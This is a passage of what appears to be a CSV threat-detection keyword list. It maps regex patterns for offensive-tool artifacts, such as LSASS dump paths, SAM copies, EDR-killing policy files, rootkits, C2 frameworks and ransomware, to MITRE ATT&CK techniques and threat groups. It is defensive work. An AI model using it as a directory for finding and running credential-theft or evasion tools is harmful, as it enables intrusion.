Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","36518" "*byt3bl33d3r/NimDllSideload*",".{0,1000}byt3bl33d3r\/NimDllSideload.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","36519" "*byt3bl33d3r/pth-toolkit*",".{0,1000}byt3bl33d3r\/pth\-toolkit.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36520" "*byt3bl33d3r/pth-toolkit*",".{0,1000}byt3bl33d3r\/pth\-toolkit.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","36521" "*byt3bl33d3r/SpamChannel*",".{0,1000}byt3bl33d3r\/SpamChannel.{0,1000}","offensive_tool_keyword","SpamChannel","Spoof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing &
Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","N/A","8","4","335","36","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z","36522" "*byt3bl33d3r/SprayingToolkit*",".{0,1000}byt3bl33d3r\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","36523" "*byt3bl33d3r@pm.me*",".{0,1000}byt3bl33d3r\@pm\.me.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","#email","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","36524" "*bytecode77/r77-rootkit*",".{0,1000}bytecode77\/r77\-rootkit.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","36525" "*-c /tmp/redsocks.conf*",".{0,1000}\-c\s\/tmp\/redsocks\.conf.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP 
traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","36526" "*-c 854A20FB-2D44-457D-992F-EF13785D2B51*",".{0,1000}\-c\s854A20FB\-2D44\-457D\-992F\-EF13785D2B51.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","36527" "*-c BOF.cpp -o BOF.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 
- Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","36528" "*-c BOF.cpp -o BOF.x64.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","36529" "*-c credentialmanager.c -o credentialmanager.o*",".{0,1000}\-c\scredentialmanager\.c\s\-o\scredentialmanager\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36530" "*-c modifiableautorun.c -o modifiableautorun.o*",".{0,1000}\-c\smodifiableautorun\.c\s\-o\smodifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36531" "*-c tokenprivileges.c -o tokenprivileges.o*",".{0,1000}\-c\stokenprivileges\.c\s\-o\stokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36532" "*-c unquotedsvcpath.c -o unquotedsvcpath.o*",".{0,1000}\-c\sunquotedsvcpath\.c\s\-o\sunquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities 
caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36533" "*C$\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b*",".{0,1000}C\$\\\\Windows\\\\System32\\\\CodeIntegrity\\\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","36534" "*C$\Windows\System32\CodeIntegrity\SiPolicy.p7b*",".{0,1000}C\$\\Windows\\System32\\CodeIntegrity\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","36535" "*C&C => *",".{0,1000}C\&C\s\=\>\s.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","36536" "*c:/chaos-container:/database/*",".{0,1000}c\:\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","36538" 
"*c:/users/public/creds.log*",".{0,1000}c\:\/users\/public\/creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","36539" "*c:\\com-test\\v2\\*",".{0,1000}c\:\\\\com\-test\\\\v2\\\\.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36541" "*c:\\echo_driver.sys*",".{0,1000}c\:\\\\echo_driver\.sys.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","36542" "*C:\\SPRAY_*.dmp*",".{0,1000}C\:\\\\SPRAY_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","36543" "*C:\\temp\\debug.dmp*",".{0,1000}C\:\\\\temp\\\\debug\.dmp.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - 
T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","36544" "*C:\\temp\\test.txt*",".{0,1000}C\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","36545" "*C:\\temp\\testlog\\mylogdddd.blf.blf*",".{0,1000}C\:\\\\temp\\\\testlog\\\\mylogdddd\.blf\.blf.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#content","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","36546" "*C:\\Users\\{username}\\AppData\\Local\\CoreAIPlatform.00\\UKP*",".{0,1000}C\:\\\\Users\\\\\{username\}\\\\AppData\\\\Local\\\\CoreAIPlatform\.00\\\\UKP.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","script content","5","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","36547" "*C:\\Users\\DARKN3T\\Downloads*",".{0,1000}C\:\\\\Users\\\\DARKN3T\\\\Downloads.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential 
Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","36548" "*C:\\Users\\L.Ackerman=*",".{0,1000}C\:\\\\Users\\\\L\.Ackerman\=.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","36549" "*C:\\Users\\Public\\callback.el*",".{0,1000}C\:\\\\Users\\\\Public\\\\callback\.el.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","36550" "*C:\\Users\\Public\\example.txt*",".{0,1000}C\:\\\\Users\\\\Public\\\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","36551" "*C:\\Users\\Public\\Windows\\Ui\\*",".{0,1000}C\:\\\\Users\\\\Public\\\\Windows\\\\Ui\\\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","36552" "*C:\\windows\\temp\\Coredump.dmp*",".{0,1000}C\:\\\\windows\\\\temp\\\\Coredump\.dmp.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","36553" "*C:\\windows\\temp\\sam*",".{0,1000}C\:\\\\windows\\\\temp\\\\sam.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","36554" "*c:\\windows\\temp\\test1.txt*",".{0,1000}c\:\\\\windows\\\\temp\\\\test1\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36555" "*c:\\windows\\temp\\test2.txt*",".{0,1000}c\:\\\\windows\\\\temp\\\\test2\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36556" "*c:\\windows\\temp\\test3.txt*",".{0,1000}c\:\\\\windows\\\\temp\\\\test3\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36557" "*c:\__output*",".{0,1000}c\:\\__output.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","36558" "*c:\123.txt*",".{0,1000}c\:\\123\.txt.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","36559" "*C:\aab.txt*",".{0,1000}C\:\\aab\.txt.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","36560" "*c:\agent.exe*",".{0,1000}c\:\\agent\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","36561" "*C:\ASEC.log*",".{0,1000}C\:\\ASEC\.log.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36562" "*c:\com-test\v2\*",".{0,1000}c\:\\com\-test\\v2\\.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36563" "*C:\dir2.bat*",".{0,1000}C\:\\dir2\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36565" "*C:\dir4.bat*",".{0,1000}C\:\\dir4\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36566" "*C:\dir5.bat*",".{0,1000}C\:\\dir5\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - 
T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36567" "*C:\dir6.bat*",".{0,1000}C\:\\dir6\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36568" "*C:\dir7.bat*",".{0,1000}C\:\\dir7\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36569" "*C:\dsc_hello.txt*",".{0,1000}C\:\\dsc_hello\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","36570" "*C:\kernel.dmp*",".{0,1000}C\:\\kernel\.dmp.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","36571" "*C:\ProgramData\1.ps1*",".{0,1000}C\:\\ProgramData\\1\.ps1.{0,1000}","offensive_tool_keyword","POC","suspicious script name and path used by attackers","T1059.001","TA0002","N/A","Dispossessor","Exploitation 
tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","36574" "*C:\ProgramData\Prefetch\na.exe*",".{0,1000}C\:\\ProgramData\\Prefetch\\na\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","36575" "*C:\ProgramData\SystemData\microsoft_Windows.dll*",".{0,1000}C\:\\ProgramData\\SystemData\\microsoft_Windows\.dll.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","36576" 